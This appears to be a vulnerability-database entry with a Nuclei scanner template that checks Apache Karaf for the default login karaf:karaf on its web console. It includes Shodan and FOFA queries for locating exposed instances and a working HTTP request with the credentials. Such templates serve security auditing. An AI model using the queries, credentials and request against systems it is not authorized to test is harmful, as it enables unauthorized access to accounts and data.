Apache Karaf contains a default login vulnerability. Default login credentials were detected. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
shodan: realm="karaf"
fofa: apache-karaf
PoC代码[已公开]
id: karaf-default-login
info:
name: Apache Karaf - Default Login
author: s0obi
severity: high
description: Apache Karaf contains a default login vulnerability. Default login credentials were detected. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://karaf.apache.org/manual/latest/webconsole
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: realm="karaf"
product: karaf
vendor: apache
tags: default-login,apache,karaf,vuln
http:
- raw:
- |
GET /system/console HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('karaf:karaf')}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Apache Karaf Web Console - Bundles"
- "Web Console</a>"
- "Log out</a>"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502206bc622e5c23aaefb4e26d1a67ecb83d3169c38da8a4ff8389c59af1f5b97a209022100ae320667220cbac352e3d82e89bf4fb6b82893f3428618f815e5b937bea76f82:922c64590222798bb761d5b6d8e72950